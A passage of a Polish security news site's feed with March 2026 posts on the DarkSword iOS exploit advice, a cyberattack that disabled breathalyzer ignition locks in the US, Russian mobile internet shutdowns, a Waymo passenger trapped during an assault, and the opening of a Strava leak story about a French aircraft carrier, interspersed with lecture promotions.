<p>Na szczęście, ataki DarkSword nie powiodą się, jeśli urzędzenie jest zaktualizowane do najnowszego, dostępnego od października 2025 systemu iOS 26. Na marginesie: Apple nie wydało wersji iOS 19 ponieważ zmieniło numerację tak aby odpowiadała ona bieżącej dacie. Dla naprawdę starych urządzeń, które nie są wspierane przez iOS 26, Apple wydało ratunkową łatkę bezpieczeństwa 11 marca.</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword2-scaled.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword2-600x345.jpg" alt="" width="600" height="345" class="aligncenter size-large wp-image-26937" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword2-600x345.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword2-350x201.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword2-768x441.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword2-1536x883.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/darksword2-2048x1177.jpg 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Mam iPhone&#8217;a &#8212; co robić, jak żyć?</h3>
<p>Aby nie paść ofiarą DarkSword, zastosuj się do poniższych rad:</p>
<ul>
<li>Zaktualizuj system do najnowszej wersji iOS 26. Jeśli Twoje urządzenie nie wspiera iOS 26, zainstaluj łatkę bezpieczeństwa dla starszego systemu, która została wydane 11 marca lub włącz tryb Lockdown.</li>
<li>Włącz Tryb Blokady (Lockdown Mode). To specjalna funkcja w urządzeniach Apple, która drastycznie ogranicza wektory ataków, blokując m.in. podejrzane skrypty na stronach www i w komunikatorach. </li>
</ul>
<p>Jeśli chcesz wiedzieć więcej o tym, jak zabezpieczyć swojego smartfona (nie tylko iPhona) przed atakami, które mogą zagrażać Twoim pieniądzom, danym lub prywatności, to wpadnij na nasz wykład pt. &#8220;Jak nie dać się zhackować?&#8221;, z którym w najbliższych tygodniach odwiedzimy te miasta: </p>
<ul>
<li><a href="https://nbzp.cz/jnsz-kra2604" target="_blank">Krakowie, 9 kwietnia &#8212; zapisz się tutaj!</a></li>
<li><a href="https://nbzp.cz/jnsz-waw2604" target="_blank">Warszawie, 16 kwietnia &#8212; zapisz się tutaj!</a></li>
<li><a href="https://nbzp.cz/jnsz-wro2606" target="_blank">Wrocławiu, 11 czerwca &#8212; zapisz się tutaj!</a></li>
</ul>
<p>Ten wykład, to wszystko co dziś każdy powinien wiedzieć na temat cyberbezpieczeństwa. Kropka. Całość wiedzy podajemy w przystępny i zrozumiały dla każdego sposób, więc zapraszamy wszystkich, także osoby całkowicie nietechniczne. Można z rodzicami, można z dziadkami, można z dziećmi (rekomendujemy 15+). Będą widowiskowe pokazy ataków na żywo. Będzie dużo praktycznych, ale prostych i darmowych do wdrożenia rad. Gwarantujemy, że z wykładu wyjdziesz bezpieczniejszy. Ten wykład dopieszczaliśmy przez 6 lat i widziało go już ponad 100 tys. osób (średnia ocena to 9,48/10). <a href="https://niebezpiecznik.pl/wyklad" target="_blank">Kliknij tutaj aby zobaczyć pełen opis i film z poprzedniej edycji oraz żeby zarezerwować miejsce dla siebie</a>.</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/darksword-iphone-ios-exploit/#comments" rel="replies" thr:count="21" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/darksword-iphone-ios-exploit/feed/atom/" rel="replies" thr:count="21" type="application/atom+xml"/>
			<thr:total>21</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Cyberatak unieruchomił niektóre samochody w USA]]></title>
		<link href="https://niebezpiecznik.pl/post/cyberatak-unieruchomil-niektore-samochody-w-usa/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26927</id>
		<updated>2026-03-23T14:55:06Z</updated>
		<published>2026-03-23T12:44:33Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="alkohol"/><category scheme="https://niebezpiecznik.pl" term="atak"/><category scheme="https://niebezpiecznik.pl" term="blokada"/><category scheme="https://niebezpiecznik.pl" term="DoS"/><category scheme="https://niebezpiecznik.pl" term="paraliż"/><category scheme="https://niebezpiecznik.pl" term="samochody"/><category scheme="https://niebezpiecznik.pl" term="USA"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/cyberatak-unieruchomil-niektore-samochody-w-usa/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/Breathalyzer-connection-outage-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>14 marca Intoxalock, amerykańska firma dostarczająca samochodowe blokady alkoholowe padła ofiarą cyberataku. W efekcie tysiące kierowców w aż 46 stanach USA straciło możliwość uruchomienia swoich pojazdów. Blokady alkoholowe podłączone do internetu, cóż mogło pójść nie tak&#8230; Blokady alkoholowe to urządzenia montowane w pojazdach, najczęściej na mocy nakazu sądowego dla osób skazanych za jazdę pod wpływem [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/cyberatak-unieruchomil-niektore-samochody-w-usa/"><![CDATA[<p>14 marca Intoxalock, amerykańska firma dostarczająca samochodowe blokady alkoholowe padła ofiarą cyberataku. W efekcie tysiące kierowców w aż 46 stanach USA straciło możliwość uruchomienia swoich pojazdów.<span id="more-26927"></span></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/Breathalyzer-connection-outage-scaled.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/Breathalyzer-connection-outage-600x342.jpg" alt="" width="600" height="342" class="aligncenter size-large wp-image-26928" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/Breathalyzer-connection-outage-600x342.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/Breathalyzer-connection-outage-350x200.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/Breathalyzer-connection-outage-768x438.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/Breathalyzer-connection-outage-1536x876.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/Breathalyzer-connection-outage-2048x1168.jpg 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Blokady alkoholowe podłączone do internetu, cóż mogło pójść nie tak&#8230;</h3>
<p>Blokady alkoholowe to urządzenia montowane w pojazdach, najczęściej na mocy nakazu sądowego dla osób skazanych za jazdę pod wpływem alkoholu. Mechanizm jest prosty &#8212; przed uruchomieniem silnika kierowca musi dmuchnąć w ustnik. Jeśli urządzenie wykryje alkohol, zapłon zostaje zablokowany. Problem w tym, że dzisiejsze alkomaty są na stałe podłączone do internetu bo &#8212; jak <a href="https://wgme.com/news/local/cyberattack-leaves-maine-drivers-with-breathalyzer-test-systems-unable-to-start-vehicles-oui-intoxalock" target="_blank">tłumaczy</a> przedstawiciel producenta &#8212; wymagają zdalnej kalibracji co jakiś czas. Widzicie już pewnie co tu poszło nie tak&#8230; Gdy po ataku infrastruktura producenta padła, urządzenia które wymagały kalibracji przeszły w &#8220;tryb awaryjny&#8221; i prewencyjnie odcięły zapłon, niezależnie od tego, czy kierowca był trzeźwy, czy nie. </p>
<p>Ten incydent to doskonały przykład na to, jak niebezpieczne bywa bezkrytyczne poleganie na urządzeniach, które do podstawowego działania wymagają nieprzerwanego połączenia z chmurą producenta. To nie pierwszy raz, kiedy błędy lub ataki na infrastrukturę zewnętrzną uziemiają &#8220;inteligentne&#8221; sprzęty. Kiedyś pisaliśmy o podobnych przypadkach z <a href="https://niebezpiecznik.pl/post/ransomware-zaatakowalo-hotel-ale-wcale-nie-uwiezilo-gosci-w-hotelowych-pokojach/" target="_blank">inteligentnymi zamkami do drzwi</a>.</p>
<p>W przypadku alkomatów samochodowych sprawa jest jednak znacznie poważniejsza ze względów prawnych. Zgodnie z relacjami kierowców w serwisie Reddit, osoby posiadające sądowy nakaz korzystania z urządzenia nie mogą go po prostu zdemontować, ani legalnie prowadzić innego auta. W efekcie cyberatak uwięził ich w domach i uniemożliwił np. dojazd do pracy. A wiadomo jak to jest w USA, wszędzie trzeba samochodem bo chodników nie ma ;P</p>
<div class="info">Nawet jeśli nie masz alkomatu w samochodzie, to zapewne na co dzień korzystasz z wielu innych rzeczy podłączonych do internetu. Czy wiesz na jakie zagrożenia te rzeczy mogą Cię narazić? Czy potrafisz się przed nimi poprawnie zabezpieczyć? Posłuchaj rad, które podniosą Twoje bezpieczeństwo, nie tylko w kontekście ataków związanych z &#8220;internetem rzeczy&#8221;. Już za chwilę w Warszawie i Krakowie odbędzie się nasz wykład pt. &#8220;<a href="https://niebezpiecznik.pl/wyklad" target="_blank">Jak Nie Dać Się Zhackować?</a>&#8220;, podczas którego przystępnym i <strong>zrozumiałym dla każdego językiem</strong> przekażemy wiedzę, którą dziś każdy korzystający z internetu musi posiadać. Będzie o tym jak zabezpieczyć się przed aktualnymi atakami, jak ochronić swoje pieniądze, dane i prywatność. <a href="https://niebezpiecznik.pl/wyklad" target="_blank">Kliknij tu aby sprawdzić terminy, pełen opis i zapisz się na wykład już dziś</a>!</div>
<p>Na razie nie wiadomo, kto dokładnie stoi za atakiem i czy był to ransomware. W Polsce, choć były takie pomysły, na razie nie mamy scentralizowanego i uzależnionego od połączeń internetowych systemu blokad alkoholowych. Ale ten trend podłączania wszystkiego do sieci z roku na rok przybiera na sile. Zresztą, paraliż nie musi się rozpocząć od ataku na producenta blokady alkoholowej. Przecież same samochody to dziś komputery, które są na stałe podłączone do internetu i przez ten internet &#8212; na skutek działania samego producenta lub atakujących &#8212; mogą zostać unieruchomione. Takie ataki miały już miejsce w przeszłości.</p>
<p>Podsumowując &#8212; jeśli pijesz, nie jedź. A jeśli nie pijesz&#8230; upewnij się, że Twój samochód do startu nie wymaga połaczenia z internetem. W dobie ataków może się okazać, że o wiele szybciej jest wytrzeźwieć, niż doczekać się przywrócenia usług po udanym cyberataku.</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/cyberatak-unieruchomil-niektore-samochody-w-usa/#comments" rel="replies" thr:count="12" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/cyberatak-unieruchomil-niektore-samochody-w-usa/feed/atom/" rel="replies" thr:count="12" type="application/atom+xml"/>
			<thr:total>12</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Putin urwał od internetu. Rosjanie w panice googlują, jak uciec z kraju]]></title>
		<link href="https://niebezpiecznik.pl/post/putin-urwal-od-internetu-rosjanie-w-panice-googluja-jak-uciec-z-kraju/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26923</id>
		<updated>2026-03-23T11:37:54Z</updated>
		<published>2026-03-23T11:37:54Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="blokada"/><category scheme="https://niebezpiecznik.pl" term="cenzura"/><category scheme="https://niebezpiecznik.pl" term="drony"/><category scheme="https://niebezpiecznik.pl" term="internet"/><category scheme="https://niebezpiecznik.pl" term="Rosja"/><category scheme="https://niebezpiecznik.pl" term="wojna"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/putin-urwal-od-internetu-rosjanie-w-panice-googluja-jak-uciec-z-kraju/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/Russia-mobile-network-outage-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Rosja po raz kolejny podkręca restrykcje w dostępie do internetu. Jak donosi serwis CNN, działania władz na Kremlu skutkują masowymi przerwami w dostępie do sieci. Tym razem jednak nie chodzi (tylko) o to, aby Rosjanie dowiedzieli się, jak wygląda prawda prezentowana na zachodnich portalach. Przerwy w dostępie do internetu mają na celu utrudnienie ataków na rosyjskie [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/putin-urwal-od-internetu-rosjanie-w-panice-googluja-jak-uciec-z-kraju/"><![CDATA[<p>Rosja po raz kolejny podkręca restrykcje w dostępie do internetu. Jak donosi serwis CNN, działania władz na Kremlu skutkują masowymi przerwami w dostępie do sieci. Tym razem jednak nie chodzi (tylko) o to, aby Rosjanie dowiedzieli się, jak wygląda prawda prezentowana na zachodnich portalach. Przerwy w dostępie do internetu mają na celu utrudnienie ataków na rosyjskie miasta. Przede wszystkim tych realizowanych poprzez drony, które są sterowane za pomocą rosyjskich sieci telefonii komórkowej. Efekt? Ludzie bez internetu chcą uciekać z kraju&#8230;<span id="more-26923"></span></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/Russia-mobile-network-outage.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/Russia-mobile-network-outage-600x366.jpg" alt="" width="600" height="366" class="aligncenter size-large wp-image-26924" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/Russia-mobile-network-outage-600x366.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/Russia-mobile-network-outage-350x214.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/Russia-mobile-network-outage-768x468.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/Russia-mobile-network-outage-1536x937.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/Russia-mobile-network-outage-2048x1249.jpg 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p><H3>Moskwa w trybie offline</H3>Od początku marca stolica Rosji oraz Petersburg doświadczają bezprecedensowych przerw w dostępie do mobilnego internetu i usług telekomunikacyjnych. Jak donoszą zachodnie serwisy informacyjne, powołując się na relacje lokalnych mieszkańców, awarie są na niespotykaną dotąd skalę. Nie działają aplikacje, nawigacja w centrum miast leży, a problemy rozlały się także na zwykłe połączenia głosowe i wiadomości SMS. Rosjanie radzą sobie jak mogą. Z półek sklepowych masowo znikają papierowe mapy i krótkofalówki,</p>
<p>11 marca rzecznik Dmitrij Pieskow oświadczył, że ograniczenia potrwają &#8220;<em>tak długo, jak będą wymagały tego względy bezpieczeństwa naszych obywateli</em>&#8220;. Państwowa agencja informacyjna RIA-Novosti tłumaczy te działania walką z &#8220;<em>coraz bardziej wyrafinowanymi metodami</em>&#8221; ukraińskich ataków na terytorium Rosji. Ale eksperci od wolności słowa mają jednak wątpliwości &#8212; niektórzy uważają, że chodzi o coś więcej. Spekulują, że władze <strong>sprawdzają w ten sposób swoje możliwości dławienia protestów na wypadek ogłoszenia niepopularnej, powszechnej mobilizacji na front</strong>. Michaił Klimariew, szef Internet Protection Society, skwitował to wprost w wywiadzie dla mediów: &#8220;<em>W każdej sytuacji, gdy władze dostrzegają zagrożenie dla siebie (&#8230;) wyłączą internet. Zupełnie jak w Iranie</em>&#8220;.</p>
<p>Tu warto podkreślić, że internet jest ograniczany wyłącznie do zasobów znajdujących się na państwowej &#8220;białej liście&#8221;. Filtry selektywnie przepuszczają jedynie ruch kierowany do zatwierdzonych serwisów rządowych, mediów propagandowych oraz krajowych platform e-commerce. </p>
<p>Rosja od lat przygotowywała się do całkowitego odizolowania swojej sieci od reszty świata. O wcześniejszych testach Runetu, zwanego &#8220;suwerennym internetem&#8221;, pisaliśmy już niejednokrotnie. Do blokowania niepokornych treści i odcinania zachodnich usług, Roskomnadzor (rosyjski urząd do spraw telekomunikacji) wykorzystywał do tej pory na szeroką skalę technologię DPI (Deep Packet Inspection). W skrócie: to zaawansowany mechanizm analizy ruchu sieciowego. Pozwala on nie tylko sprawdzić skąd i dokąd przesyłany jest dany pakiet danych, ale też zajrzeć do jego wnętrza w locie i po cichu go &#8220;ubić&#8221;, jeśli zawiera sygnaturę zakazanej aplikacji &#8212; na przykład zachodniego VPN-a, pozwalającego na omijanie cenzury. Teraz jednak widać zastosowanie &#8220;białych list&#8221;, co oznacza, że tradycyjne metody obchodzenia cenzury, takie jak proste serwery proxy czy popularne protokoły VPN, stają się nieskuteczne. </p>
<h3>Googlają jak uciec z kraju</h3>
<p>Efekt? Oto frazy, które obecnie notują potężne skoki popularności w Rosji to między innymi:</p>
<p><code>"jak wyjechać z Rosji"<br />
"działające VPN 2026"</code></p>
<p>Wygląda na to, że obywatele doskonale zdają sobie sprawę z powagi sytuacji. Wiedzą, że to nie są zwykłe &#8220;prace konserwacyjne&#8221;, o których zazwyczaj trąbi państwowa propaganda, lecz celowe i systemowe odcinanie ich od świata. </p>
<h3>Cyfrowy blackout &#8212; co robić, jak żyć?</h3>
<p>Oglądanie tego, co dzieje się u Rosjan, to świetny pretekst do refleksji. Jak przygotować się na brak intenretu? Jeśli padnie infrastruktura GSM i mobilny internet, warto wiedzieć co robić, a o tym szeroko mówiliśmy <a href="https://sklep.niebezpiecznik.pl/opis/23" target="_blank">w naszym darmowym szkoleniu &#8220;Jak ROZSĄDNIE przygotować się na kryzys?&#8221;</a> a wątek komunikacji awaryjnej rozszerzyliśmy w szkoleniu &#8220;<a href="https://sklep.niebezpiecznik.pl/opis/25" target="_blank">Radiokomunikacja dla amatorów</a>&#8220;. W obu materiałach jest masa porad, więc polecamy się z nimi zapoznać &#8212; zanim będzie za późno. </p>
<p>Na zachęte dwie wybrane rady:</p>
<ul>
<li>Zainstaluj aplikacje typu Mesh: Komunikatory takie jak Briar pozwalają na przesyłanie wiadomości bezpośrednio między urządzeniami przez Bluetooth i lokalne Wi-Fi (tworząc sieć typu peer-to-peer).</li>
<li>Zadbajcie o nawigację offline: Mapy papierowe są ok, ale pamiętaj że są też aplikacje mapowe działające offline, np. OsmAnd lub tryb offline map Google (trzeba zawczasu zrzucić sobie wybrany obszar).</li>
</ul>
<p>Zapewne jeszcze sporo czasu minie, zanim w Polsce nastąpi ryzyko cyfrowego blackoutu, ale już teraz nad Polakami wisi widmo cyberataków. Dlatego tak ważne jest aby odpowiednio się na nie przygotować. Jak to zrobić? Rady w tym zakresie publikujemy na Niebezpieczniku i naszych profilach od lat, ale zebraliśmy je wszystkie w jeden wygodny wykład pt. &#8220;<strong>Jak nie dać się zhackować?</strong>&#8220;. I zapraszamy Cię do udziału w tym wykładzie <a href="https://niebezpiecznik.pl/wyklad" target="_blank">w Krakowie lub Warszawie &#8212; sprawdź terminy</a>. </p>
<p>Ten wykład trwa 3 godziny i jest prowadzony przystępnym, zrozumiałym dla każdego językiem. Więc zabierz na niego swoich rodziców, dziadków albo nietechnicznych znajomych. Pokażemy ataki, które dziś każdy musi znać, przekażemy też proste ale skuteczne rady, które każdemu pomogą skutecznie zabezpieczyć się przed kradzieżą jego pieniędzy, danych i prywatności. Ten wykład realizujemy od 5 lat, widziało go ponad 100 tysięcy osób a średnia z ocen to 9,48/10. <a href="https://bilety.niebezpiecznik.pl" target="_blank">Kliknij tutaj i zapisz się już teraz na wykład w Twoim mieście</a>!    </p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/putin-urwal-od-internetu-rosjanie-w-panice-googluja-jak-uciec-z-kraju/#comments" rel="replies" thr:count="16" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/putin-urwal-od-internetu-rosjanie-w-panice-googluja-jak-uciec-z-kraju/feed/atom/" rel="replies" thr:count="16" type="application/atom+xml"/>
			<thr:total>16</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Pasażerowie uwięzieni w autonomicznej taksówce podczas napadu]]></title>
		<link href="https://niebezpiecznik.pl/post/pasazerowie-uwiezieni-w-autonomicznej-taksowce-podczas-napadu/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26917</id>
		<updated>2026-03-23T09:21:08Z</updated>
		<published>2026-03-23T09:21:08Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="autonomiczne pojazdy"/><category scheme="https://niebezpiecznik.pl" term="samochody"/><category scheme="https://niebezpiecznik.pl" term="taxi"/><category scheme="https://niebezpiecznik.pl" term="waymo"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/pasazerowie-uwiezieni-w-autonomicznej-taksowce-podczas-napadu/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/taxi-lol-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Wyobraźcie sobie taką sytuację: jedziecie autonomiczną taksówką, gdy nagle agresywny przechodzień zastępuje Wam drogę i zaczyna walić w szyby, grożąc śmiercią. Nomalny, białkowy kierowca (czyt. człowiek) wcisnąłby gaz do dechy i odjechał. Ale w autonomiczna taksówka Waymo kierowcy nie ma, a jej algorytm jest w takich sytuacjach bezlitosny: &#8220;widzę człowieka blisko maski, nie mogę ruszyć&#8221;. [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/pasazerowie-uwiezieni-w-autonomicznej-taksowce-podczas-napadu/"><![CDATA[<p>Wyobraźcie sobie taką sytuację: jedziecie autonomiczną taksówką, gdy nagle agresywny przechodzień zastępuje Wam drogę i zaczyna walić w szyby, grożąc śmiercią. Nomalny, białkowy kierowca (czyt. człowiek) wcisnąłby gaz do dechy i odjechał. Ale w autonomiczna taksówka Waymo kierowcy nie ma, a jej algorytm jest w takich sytuacjach bezlitosny: &#8220;widzę człowieka blisko maski, nie mogę ruszyć&#8221;. Poczytajcie o 6 minutowym horrorze pewnego pasażera uwięzionego w taksówce&#8230;<span id="more-26917"></span></p>
<h3>To nie był ćpun</h3>
<p>Powyższa historia dotknęła Douga, 37-letniego pracownika branży tech w San Francisco. Napastnik atakujący jego taksówkę nie był pod wpływem środków odurzających, był po prostu wściekły na &#8220;roboty odbierające pracę&#8221; i pasażerów, którzy je finansują. Walił więc w szybę przez kilka minut i groził śmiercią. Sytuacja była poważna, ale problem polegał na tym, że systemy bezpieczeństwa autonomicznych pojazdów zostały zaprojektowane tak, aby za wszelką cenę unikać potrącenia pieszego. I tu pojawia się &#8220;błąd logiczny&#8221; algorytmu &#8212; no bo co, jeśli pieszy jest atakującym? </p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/taxi-lol.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/taxi-lol-600x318.jpg" alt="" width="600" height="318" class="aligncenter size-large wp-image-26918" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/taxi-lol-600x318.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/taxi-lol-350x186.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/taxi-lol-768x408.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/taxi-lol.jpg 976w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p>No dobra, to może: </p>
<ul>
<li>wskoczyć za kółko, przejąć stery i odjechać? Otóż nie. To niemożliwe. Pasażer nie może przesiąść się na fotel kierowcy i odjechać. Software na to nie pozwala.</li>
<li>zadzwonić na support, jakkolwiek komicznie by to nie zabrzmiało? Też niczego nie da. Doug się co prawda dodzwonił, ale Waymo odmówiło zdalnego sterowania autem, dopóki ktoś stał w pobliżu. Rozumiecie, bezpieczeństwo pieszego.</li>
</ul>
<p>Pomocni okazali się przechodnie, którzy choć paradoksalnie mieli dopingować napastnika, to na tyle go rozproszyli, że ten odsunął się wystarczająco daleko od maski taksówki, aby ta mogła ruszyć. </p>
<h3>To nie pierwszy taki przypadek</h3>
<p>To nie jest odosobniony incydent. Jakiś czas temu w Los Angeles grupa rowerzystów otoczyła pojazd, zmuszając go do zatrzymania. W innym przypadku wandalowie bezkarnie pomalowali auto sprayem, wiedząc, że maszyna nie zareaguje agresywnie ani nie spróbuje uciec, ryzykując potrącenie &#8220;artysty&#8221;.</p>
<p>Problem leży w sztywnych regułach decyzyjnych. Dla algorytmu nie ma różnicy między dzieckiem, które wbiegło na pasy, a terrorystą celującym ze strzelby w pasażera. To klasyczny dylemat, który pokazuje, że automatyzacja bez kontekstu sytuacyjnego bywa groźna. Ktoś może zacząć to wykorzystywać. Już teraz niektórzy zastanawiają się, co by było, gdyby jakaś grupa ludzi celowo zatrzymała w ten sposób autonomiczną taksówkę na &#8230;przejeździe kolejowym.</p>
<p>Może pora na przycisk &#8220;mimo wszystko jedź, na moją odpowiedzialność&#8221;. Ale pewnie wielu prawników z Doliny Krzemowej się nami nie zgodzi&#8230;</p>
<h3>Nie tylko taksówki mogą Ci zagrażać</h3>
<p>Umówmy się. Na razie to nie autonomiczne taksówki są największym zagrożeniem, przynajmniej dla Polaków. Zdecydowanie więcej złego mogą nam wyrządzić (i wyrządzają każdego dnia) cyberprzestępcy. Dlatego warto poświęcić chwilę i uporządkować wreszcie swoje cyfrowe życie &#8212; włączyć co trzeba na komputerze i skonfigurować co trzeba na smartfonie. Jak to zrobić? To pokazujemy na wykładzie &#8220;<a href="https://niebezpiecznik.pl/wyklad" target="_blank">Jak nie dać się zhackować?</a>&#8221; który już w kwietniu odbędzie się w Warszawie i Krakowie:</p>
<ul>
<li><a href="https://nbzp.cz/jnsz-kra2604" target="_blank">Krakowie, 9 kwietnia &#8212; zapisz się tutaj!</a></li>
<li><a href="https://nbzp.cz/jnsz-waw2604" target="_blank">Warszawie, 16 kwietnia &#8212; zapisz się tutaj!</a></li>
<li><a href="https://nbzp.cz/jnsz-wro2606" target="_blank">Wrocławiu, 11 czerwca &#8212; zapisz się tutaj!</a></li>
</ul>
<p><strong>To jest wykład dla każdego</strong> &#8212; jest prowadzony przystępnym i zrozumiałym dla osób nietechnicznych językiem. Weźcie rodziców albo dziadków. W 3 godziny pokażemy wszystko, co dziś każdy musi wiedzieć, aby nie dać się zhackować i ochronić swoje dane, pieniądze oraz prywatność przed internetowymi zagrożeniami. Realizujemy go od ponad 5 lat, przeszkoliliśmy setki tysięcy Polaków a średnia ocena z ankiet to 9,48/10. Nie zwlekaj, <a href="https://bilety.niebezpiecznik.pl/" target="_blank">wybierz pasujący Ci termin i zapisz się już teraz</a>!</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/pasazerowie-uwiezieni-w-autonomicznej-taksowce-podczas-napadu/#comments" rel="replies" thr:count="4" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/pasazerowie-uwiezieni-w-autonomicznej-taksowce-podczas-napadu/feed/atom/" rel="replies" thr:count="4" type="application/atom+xml"/>
			<thr:total>4</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Pozycja lotniskowca ujawniona, bo francuski żołnierz nie wyłączył zegarka podczas biegania&#8230;]]></title>
		<link href="https://niebezpiecznik.pl/post/lotniskowiec-charles-de-gaulle-strava-zolnierz-smartwach-bieganie/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26912</id>
		<updated>2026-03-23T09:20:50Z</updated>
		<published>2026-03-20T11:20:56Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="Charles de Gaulle"/><category scheme="https://niebezpiecznik.pl" term="Francja"/><category scheme="https://niebezpiecznik.pl" term="OPSEC"/><category scheme="https://niebezpiecznik.pl" term="OSINT"/><category scheme="https://niebezpiecznik.pl" term="Strava"/><category scheme="https://niebezpiecznik.pl" term="wojna"/><category scheme="https://niebezpiecznik.pl" term="wojsko"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/lotniskowiec-charles-de-gaulle-strava-zolnierz-smartwach-bieganie/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/StravaFrance-150x150.png" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Mamy kolejny incydent z aplikacją Strava, która służy do trackingu aktywności sportowych. Tym razem wpadkę zaliczyli nie Amerykanie a Francuzi z lotniskowca &#8220;Charles de Gaulle&#8221;: Ale zanim zaczniecie pisać &#8220;jakież to było nieodpowiedzialne i groźne zachowanie!&#8220;, warto zwrócić uwagę, że lotniskowce to nie okręty podwodne i do najmniejszych nie należą. Innymi słowy: łatwo można je zlokalizować za pomocą [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/lotniskowiec-charles-de-gaulle-strava-zolnierz-smartwach-bieganie/"><![CDATA[<p>Mamy <a href="https://niebezpiecznik.pl/post/tajne-obiekty-wojskowe-z-calego-swiata-zaswiecily-sie-na-zolto-na-tej-mapie/" target="_blank">kolejny incydent z aplikacją Strava</a>, która służy do trackingu aktywności sportowych. Tym razem wpadkę zaliczyli nie Amerykanie a <a href="https://www.lemonde.fr/international/article/2026/03/19/stravaleaks-le-porte-avions-charles-de-gaulle-localise-en-temps-reel-par-le-monde-grace-a-l-application-de-sport_6672445_3210.html" target="_blank">Francuzi</a> z lotniskowca &#8220;Charles de Gaulle&#8221;:</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/StravaFrance.png"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/StravaFrance-600x476.png" alt="" width="600" height="476" class="aligncenter size-large wp-image-26913" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/StravaFrance-600x476.png 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/StravaFrance-315x250.png 315w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/StravaFrance.png 679w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
